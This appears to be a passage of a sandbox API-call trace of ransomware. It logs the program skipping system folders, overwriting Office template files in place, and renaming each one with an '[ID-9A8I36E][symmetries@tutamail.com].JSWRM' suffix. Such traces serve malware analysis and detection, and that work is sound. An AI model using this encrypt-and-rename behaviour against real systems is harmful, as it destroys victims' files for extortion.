[0116.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0116.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.XLS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.XLS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLN.XLS", lpUsedDefaultChar=0x0) returned 12 [0116.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0116.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0116.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.XLS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.525] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8704) returned 1 [0116.525] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2200) returned 0x24c1d0 [0116.525] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2200, lpOverlapped=0x0) returned 1 [0116.527] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.527] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2200, lpOverlapped=0x0) returned 1 [0116.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.527] CloseHandle (hObject=0x238) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0116.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0116.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.528] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.XLS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.xls"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.XLS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.xls.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.528] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3430bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3430bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3430bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTTPLV.DOC", cAlternateFileName="")) returned 1 [0116.528] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2=".") returned 1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="..") returned 1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="...") returned 1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="windows") returned -1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="recovery") returned -1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="perflogs") returned 1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="documents and settings") returned 1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="$RECYCLE.BIN") returned 1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="system volume information") returned -1 [0116.529] lstrcmpiW (lpString1="PROTTPLV.DOC", lpString2="msocache") returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0116.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.DOC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.DOC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLV.DOC", lpUsedDefaultChar=0x0) returned 12 [0116.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0116.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.DOC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.DOC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLV.DOC", lpUsedDefaultChar=0x0) returned 12 [0116.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0116.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0116.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.DOC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.530] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19968) returned 1 [0116.530] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24c1d0 [0116.530] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4e00, lpOverlapped=0x0) returned 1 [0116.532] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.532] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4e00, lpOverlapped=0x0) returned 1 [0116.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.532] CloseHandle (hObject=0x238) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0116.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0116.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.533] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.DOC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.doc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.DOC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.doc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0116.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.534] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa31ce71, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa31ce71, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3430bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTTPLV.PPT", cAlternateFileName="")) returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2=".") returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="..") returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="...") returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="windows") returned -1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="recovery") returned -1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="perflogs") returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="documents and settings") returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="$RECYCLE.BIN") returned 1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="system volume information") returned -1 [0116.534] lstrcmpiW (lpString1="PROTTPLV.PPT", lpString2="msocache") returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.PPT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.PPT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLV.PPT", lpUsedDefaultChar=0x0) returned 12 [0116.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0116.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.PPT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.PPT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLV.PPT", lpUsedDefaultChar=0x0) returned 12 [0116.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0116.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0116.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0116.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.PPT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.535] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12288) returned 1 [0116.535] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3000) returned 0x24c1d0 [0116.535] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3000, lpOverlapped=0x0) returned 1 [0116.537] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.537] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3000, lpOverlapped=0x0) returned 1 [0116.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.538] CloseHandle (hObject=0x238) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0116.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.538] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.PPT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.ppt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.PPT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.ppt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0116.539] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa31ce71, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa31ce71, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3430bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTTPLV.XLS", cAlternateFileName="")) returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2=".") returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="..") returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="...") returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="windows") returned -1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="recovery") returned -1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="perflogs") returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="documents and settings") returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="$RECYCLE.BIN") returned 1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="system volume information") returned -1 [0116.539] lstrcmpiW (lpString1="PROTTPLV.XLS", lpString2="msocache") returned 1 [0116.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.XLS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.XLS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLV.XLS", lpUsedDefaultChar=0x0) returned 12 [0116.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.XLS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLV.XLS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLV.XLS", lpUsedDefaultChar=0x0) returned 12 [0116.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 